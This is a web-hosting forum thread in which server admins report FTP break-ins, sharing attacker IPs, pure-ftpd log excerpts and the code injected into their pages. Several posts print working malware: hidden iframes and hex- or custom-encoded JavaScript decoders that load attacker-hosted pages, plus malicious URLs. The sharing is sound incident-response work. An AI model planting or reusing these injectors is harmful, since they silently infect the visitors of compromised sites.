Feel free to start a new post where admins can post security tips, helpful notes etc.
We are asking for attacking IPs in this thread for information gathering purposes. We aren't creating a list of IP's to delete or anything like that. We just need a few IP's that are known to attack several different servers to help us gain an understanding about whats occurring during the attacks and how they are being propagated.
-Todd Shipway
I have this morning 4 servers infected with iframes. These accounts where accessed by ftp.
ip: 58.65.239.10
I hope this helps.PHP Code:<iframe src='http://ltraffic.biz/resource.php?id=4531&user=Nikson' width='1' height='1' style='visibility: hidden;'></iframe>
Ronald
we've seen lots of ftp attacks from: 72.95.215.3
What percentage of accounts on each server? or are you saying EVERY account on four servers had this happen?Originally Posted by mooony
Mike
FTP connection with user password from: 77.221.133.186
code added to index.htnl
code contain links to:Code:<iframe src='http://url' width='1' height='1' style='visibility: hidden;'></iframe><script>function v4757fc58cd991(v4757fc58ce18a){ function v4757fc58ce999 () {return 16;} return(parseInt(v4757fc58ce18a,v4757fc58ce999()));}function v4757fc58cf989(v4757fc58d0183){ var v4757fc58d1171=2; var v4757fc58d097a='';for(v4757fc58d0d7d=0; v4757fc58d0d7d<v4757fc58d0183.length; v4757fc58d0d7d+=v4757fc58d1171){ v4757fc58d097a+=(String.fromCharCode(v4757fc58cd991(v4757fc58d0183.substr(v4757fc58d0d7d, v4757fc58d1171))));}return v4757fc58d097a;} document.write(v4757fc58cf989('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D633737386536356239373065207372633D5C27687474703A2F2F37372E3232312E3133332E3138382F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313936353936292B273031665C272077696474683D353136206865696768743D333831207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Code:http://77.221.133.188/.if/go.html?19427401f http://77.221.133.188/.dif/go.php?sid=1 http://77.221.133.189/.sp/in.cgi?p=t
sadly it happened to me today
WARNING do not run this code it trys also to redirect to blacksun-sl.com/arm/index.php
<!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script><!-- ~ --><!-- ~ --><script language=JavaScript>function dc(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,39,22,35,48,8,18,24,29,21,0,0,0,0,0,0,36,60,52,47,43,44,3,62,15,9,0,55,19,5,40,57,42,56,33,34,26,7,61,11,27,12,17,0,0,0,0,53,0,37,59,25,6,10,51,13,54,23,45,20,38,41,2,49,46,30,16,28,50,58,32,4,31,1,14);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}dc("ctA4iLYtJiN_iXYlUhsBZiV1ePQoILEozXgBW3N_ICNoe3ESwxgtetAtyFsKW28f9x7R6fs4ZKYlU2ORMhY4YWsfZ3OR9qQlcP5fFxgo5FAl")</script>
1)first this thing came from my personal FTP account
Jan 24 01:14:03 main pure-ftpd: (myuser@88.255.94.114)
2) my password was strong
3) if there was an mallware/spyware trojan or keylogger in my desktop computer? well give me a few days and we will know because i did change the FTP password from all my machines and i will not use FTP and will track /var/log/messages to see if this Fellow can "guess" my password using his magic trojan or if a very comon DC has a sniffer in his network what is not the case (it apparently started near to a FTP session of mine, but i mean aparently not clearly)
4) php insecure permissions or scripts were not found in my server i know how it is and was just pure-ftpd
before in the "less-secure" proftpd it didnt happen i look this threads since Jan/2007 when they started
thinking on change back to proftp
5) other customers weren't affected
6) some system crashs and lockup freeze issues happened near to this also
7) kernel, cpanel, perl all uptodate since the cpanel10 to cpanel11 change
8) also checked http://www.cpanel.net/security/notes...s_toolkit.html but this is not (by now) my case as there is no rootkit or root access at all despite of this FTP sucessfull attempts
9)chmod -w *.* in my public_html
if the hacker make again i will disable my FTP USER permanently...
The same here with the same IP
Look
!!!!Code:Jan 29 10:11:52 server7 pure-ftpd: (?@77.221.133.186) [INFO] New connection from 77.221.133.186 Jan 29 10:11:52 server7 pure-ftpd: (?@77.221.133.186) [INFO] xxxxx is now logged in Jan 29 10:12:03 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/suspended.page/index.html downloaded (4521 bytes, 18025.59KB/sec) Jan 29 10:12:04 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/suspended.page/index.html uploaded (4401 bytes, 26.92KB/sec) Jan 29 10:12:05 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/index.php downloaded (17803 bytes, 649.81KB/sec) Jan 29 10:12:06 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/index.php uploaded (18785 bytes, 28.79KB/sec) Jan 29 10:12:07 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/login.php downloaded (10275 bytes, 760.74KB/sec) Jan 29 10:12:08 server7 pure-ftpd: (xxxx@77.221.133.186) [NOTICE] /home/xxxx//public_html/vb/login.php uploaded (10332 bytes, 31.66KB/sec) Jan 29 10:12:09 server7 pure-ftpd: (xxxx@77.221.133.186) [INFO] Logout.
What will be done about this ??
Heh Me too
Heh I just got done over as well...
58.65.236.33
LinkBack URL
About LinkBacks
Reply With Quote